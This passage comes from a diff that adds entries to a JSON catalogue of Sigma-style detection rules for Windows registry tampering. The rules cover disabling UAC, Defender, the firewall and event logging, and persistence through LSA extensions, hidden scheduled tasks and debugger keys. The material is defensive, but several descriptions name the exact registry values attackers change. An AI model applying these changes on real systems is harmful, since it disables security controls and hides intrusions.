"https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7c637634-c95d-4bbf-b26c-a82510874b34", + "value": "Disable Microsoft Office Security Features" + }, + { + "description": "Detects registry modifications that disable Privacy Settings Experience", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_privacy_settings_experience.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "value": "Disable Privacy Settings Experience in Registry" + }, + { + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_security_center_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "value": "Disable Windows Security Center Notifications" + }, + { + "description": "Detects the modification of the registry to disable a system restore on the computer", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_system_restore.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "5de03871-5d46-4539-a82d-3aa992a69a83", + "value": "Registry Disable System Restore" + }, + { + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_uac_registry.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "value": "Disable UAC Using Registry" + }, + { + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "meta": { + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_disable_windows_defender_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "value": "Windows Defender Service Disabled" + }, + { + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_windows_firewall.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", + "value": "Disable Windows Firewall by Registry" + }, + { + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/04", + "falsepositive": [ + "Legitimate administrators disabling specific event log for troubleshooting" + ], + "filename": "registry_set_disable_winevt_logging.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889", + "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "value": "Disable Winevt Event Logging Via Registry" + }, + { + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disallowrun_execution.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "value": "Add DisallowRun Execution to Registry" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "value": "Persistence Via Disk Cleanup Handler - Autorun" + }, + { + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/07/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_dns_over_https_enabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://github.com/elastic/detection-rules/issues/1371", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", + "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" + ] + }, + "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "value": "DNS-over-HTTPS Enabled by Registry" + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dns_serverlevelplugindll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "value": "DNS ServerLevelPluginDll Install - Registry" + }, + { + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/09/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_enabling_cor_profiler_env_variables.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jamieantisocial/status/1304520651248668673", + "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", + "https://www.sans.org/cyber-security-summit/archives", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" + ] + }, + "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "value": "Enabling COR Profiler Environment Variables" + }, + { + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/15", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_enabling_turnoffcheck.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_etw_disabled.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_etw_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "value": "COMPlus_ETWEnabled Registry Modification - Registry" + }, + { + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "value": "Suspicious Application Allowed Through Exploit Guard" + }, + { + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_fax_change_service_user.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "e3fdf743-f05b-4051-990a-b66919be1743", + "value": "Change User Account Associated with the FAX Service" + }, + { + "description": "Detect possible persistence using Fax DLL load when service restart", + "meta": { + "author": "frack113", + "creation_date": "2022/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_fax_dll_persistance.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dottor_morte/status/1544652325570191361", + "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "value": "Change the Fax Dll" + }, + { + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_file_association_exefile.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "value": "New File Association Using Exefile" + }, + { + "description": "Detects persistence using GlobalFlags in image file execution options", + "meta": { + "author": "Karneades, Jonhnathan Ribeiro", + "creation_date": "2018/04/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_globalflags_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" + ] + }, + "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", + "value": "GlobalFlags Registry Persistence Mechanisms" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "This value is not set by default but could be rarly used by administrators" + ], + "filename": "registry_set_hangs_debugger_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/wer_debugger.html", + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", + "value": "Add Debugger Entry To Hangs Key For Persistence" + }, + { + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hhctrl_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/hhctrl.html", + "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "value": "Persistence Via Hhctrl.ocx" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_hidden_extention.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", + "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", + "value": "Registry Modification to Hidden File Extension" + }, + { + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_hide_file.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "value": "Modification of Explorer Hidden Keys" + }, + { + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_hide_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", + "value": "Registry Hide Function from User" + }, + { + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "value": "Hide Schedule Task Via Index Value Tamper" + }, + { + "description": "Detects the modification of the registry settings used for Internet Explorer and other Windows components that use these settings", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_ie_persistence.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "value": "Modification of IE Registry Settings" + }, + { + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate registration of IFilters by the OS or software" + ], + "filename": "registry_set_ifilter_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/ifilters.html", + "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/tree/master/IFilter", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ifilter_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "b23818c7-e575-4d13-8012-332075ec0a2b", + "value": "Register New IFiltre For Persistence" + }, + { + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_install_root_or_ca_certificat.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", + "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "d223b46b-5621-4037-88fe-fda32eead684", + "value": "New Root or CA or AuthRoot Certificate to Store" + }, + { + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" + }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_lsa_extension_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Persistence Via LSA Extensions" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "registry_set_mal_adwind.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "value": "Adwind RAT / JRAT - Registry" + }, + { + "description": "Attempts to detect system changes made by Blue Mockingbird", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_mal_blue_mockingbird.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112", + "attack.t1047" + ] + }, + "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", + "value": "Blue Mockingbird - Registry" + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "filename": "registry_set_mpnotify_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/mpnotify.html", + "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", + "value": "Persistence Via Mpnotify" + }, + { + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": 